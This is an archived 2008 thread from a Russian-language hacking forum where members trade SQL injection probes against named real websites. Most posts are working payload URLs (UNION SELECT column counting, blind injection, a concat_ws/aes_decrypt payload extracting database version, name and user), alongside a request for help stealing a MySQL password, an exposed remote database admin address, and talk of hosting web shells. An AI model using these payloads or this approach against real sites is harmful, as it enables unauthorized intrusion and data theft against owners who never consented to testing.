HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 292 из 2422 « Первая < 192242282 288 289 290 291 292 293 294 295 296 3023423927921292 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.08.2008, 05:10
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
help:
http://www.world-art.ru/games/games.php?id=4575+or+1=1
есть иньекция ?
http://www.litprom.ru/text.phtml?storycode=1'
Последний раз редактировалось sabe; 12.08.2008 в 10:35..
 
Ответить с цитированием

  #2  
Старый 12.08.2008, 09:53
Glazz
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332

Репутация: 15
По умолчанию
Цитата:
Сообщение от sabe  
help:



есть иньекция ?
http://www.world-art.ru/games/games.php?id=4575+or+1=1
Я не уверен, но разве в SQL инъекции когда подбирают кол-во полей , ставят or 1=1?
 
Ответить с цитированием

  #3  
Старый 12.08.2008, 08:11
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359'
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+order+by+5--
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+union+select+1,2,3,4,5--
инъекция есть, но с раскруткой проблемы. подскажет кто?
 
Ответить с цитированием

  #4  
Старый 12.08.2008, 09:16
base
Новичок
Регистрация: 20.06.2008
Сообщений: 8
Провел на форуме:
138846

Репутация: 21
По умолчанию
Цитата:
http://www.world-art.ru/games/games.php?id=4575+or+1=1
инъекта нет
Цитата:
http://www.litprom.ru/text.phtml?storycode=1'
блинд скул
Цитата:
http://www.litprom.ru/text.phtml?storycode=-9999999991+union+select+1,2/*
Цитата:
http://www.litprom.ru/text.phtml?storycode=-9999999991+union+select+1/*
инъект есть, вывода нет
читай Blind Sql Inj
 
Ответить с цитированием

  #5  
Старый 12.08.2008, 10:33
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
Glazz
это определение.. )

base
наверно ты прав.. )

Цитата:
http://kinomob.info/system/thumb.php?img_id=1+union+select+version()--
http://kinomob.info/index.php?p=showforum&fid=1+union+select+1--
логический вывод - 5 версия, как получить вывод ?
 
Ответить с цитированием

  #6  
Старый 12.08.2008, 11:10
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию
Цитата:
Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется...
А не проще на народе какой-нить аккаунт, специально для шеллов и подобного создать?
 
Ответить с цитированием

  #7  
Старый 12.08.2008, 11:32
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
http://www.world-art.ru/games/games.php?id=4575+or+1=1
инъекции НЕТ!

есть:
http://www.litprom.ru/text.phtml?storycode=1'
но слепая: http://www.litprom.ru/text.phtml?storycode=20+union+select+1
логическая ошибка
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

проходит фильтрацию. если число больше или меньше допустимого - выводится страница с ошибкой. Если нормальное (именно первое число, без остального запроса), то отправляется к БД, но уже с остальным запросом
 
Ответить с цитированием

  #8  
Старый 12.08.2008, 12:01
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию
я дето слышал что через иньекцию мона посмотреть какие папки на сервере мона такое очуществить и как?
 
Ответить с цитированием

  #9  
Старый 12.08.2008, 12:23
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/* кто поможет выудить пасс к мусклу если чо вот удалённый доступ к мусклу http://81.177.9.37:911/administration/mysql/index.php
 
Ответить с цитированием

  #10  
Старый 12.08.2008, 12:25
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
superboys, прав не хватит на чтение mysql.user
 
Ответить с цитированием
Ответ
Страница 292 из 2422 « Первая < 192242282 288 289 290 291 292 293 294 295 296 3023423927921292 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ